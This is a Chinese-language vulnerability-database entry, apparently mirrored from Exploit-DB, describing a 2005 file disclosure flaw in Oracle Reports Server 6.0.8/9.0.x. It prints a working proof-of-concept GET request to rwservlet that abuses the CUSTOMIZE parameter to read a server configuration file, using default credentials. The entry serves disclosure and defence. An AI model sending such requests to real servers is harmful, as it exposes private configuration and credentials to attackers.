Oracle Reports Server 6.0.8/9.0.x – XML File Disclosure

42次阅读
没有评论

Oracle Reports Server 6.0.8/9.0.x – XML File Disclosure

漏洞ID 1055270 漏洞类型
发布时间 2005-07-19 更新时间 2005-07-19
Oracle Reports Server 6.0.8/9.0.x - XML File DisclosureCVE编号 N/A
Oracle Reports Server 6.0.8/9.0.x - XML File DisclosureCNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/26002
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14311/info

Oracle Reports Server may allow remote attackers to disclose parts of arbitrary XML files.

Reportedly, the server fails to restrict users from accessing parts of arbitrary XML files when handling specially crafted HTTP GET requests.

All versions of Oracle Reports Server are reported to be vulnerable to this issue. 

http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=sc
ott/tiger@iasdb+destype=cache+desformat=xml+CUSTOMIZE=/opt/ORACLE/ias/oracle/pro
duct/9.0.2/webcache/webcache.xml

相关推荐: BES-CMS Multiple Module File Include Vulnerability

BES-CMS Multiple Module File Include Vulnerability 漏洞ID 1099119 漏洞类型 Input Validation Error 发布时间 2003-12-20 更新时间 2003-12-20 CVE编号 …

正文完
 0